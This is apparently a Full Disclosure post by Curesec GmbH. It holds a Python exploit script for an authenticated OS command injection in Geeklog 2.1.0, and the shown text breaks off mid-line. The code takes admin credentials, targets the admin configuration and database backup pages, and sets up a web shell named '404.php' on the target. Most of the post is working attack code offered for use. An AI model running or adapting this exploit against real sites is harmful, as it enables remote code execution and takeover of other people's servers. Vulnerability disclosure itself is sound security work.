[FD] Geeklog 2.1.0: Code Execution Exploit

#!/usr/local/bin/python # Exploit for geeklog-2.1.0 OS Command Injection vulnerability # An admin account is required to use this exploit # Curesec GmbH import sys import re import argparse import requests # requires requests lib parser = argparse.ArgumentParser() parser.add_argument("url", help="base url to vulnerable site") parser.add_argument("username", help="admin username") parser.add_argument("password", help="admin password") args = parser.parse_args() url = args.url username = args.username password = args.password loginPath = "/admin/moderation.php" configPath = "/admin/configuration.php?tab-5" backupPath = "/admin/database.php" shellFileName = "404.php" shellContent = "